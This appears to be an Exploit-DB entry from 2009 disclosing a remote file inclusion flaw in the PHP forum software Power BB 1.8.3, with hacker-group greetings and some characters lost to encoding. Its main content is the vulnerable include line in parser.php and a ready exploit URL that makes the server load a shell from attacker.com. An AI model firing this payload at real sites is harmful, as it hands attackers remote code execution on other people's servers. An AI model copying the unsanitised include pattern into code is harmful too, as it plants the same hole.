Power BB 1.8.3 - Remote File Inclusions

EDB-ID:

10289

CVE:

N/A


Author:

DigitALL

Type:

webapps


Platform:

PHP

Date:

2009-11-25


## Dada?lar Grup Komutanl??? ##

## | HackSpy | Zombie | KroNickq | DigitALL | NoFearx38 | ##

## 1923Turk Grup ##

## by DigitALL ##

## Sites : http://powerwd.net ##

## Download : http://www.phpexplorer.com/Goster/536 ##

## Download : http://sourceforge.net/projects/pbb/ ##

## Power BB 1.8.3 Remote File ?ncludes ##

## /include/parser.php

## @include($_SERVER['DOCUMENT_ROOT'].$include);

## http://server/[path]/include/parser.php?_SERVER[DOCUMENT_ROOT]=http://attacker.com/shell.txt?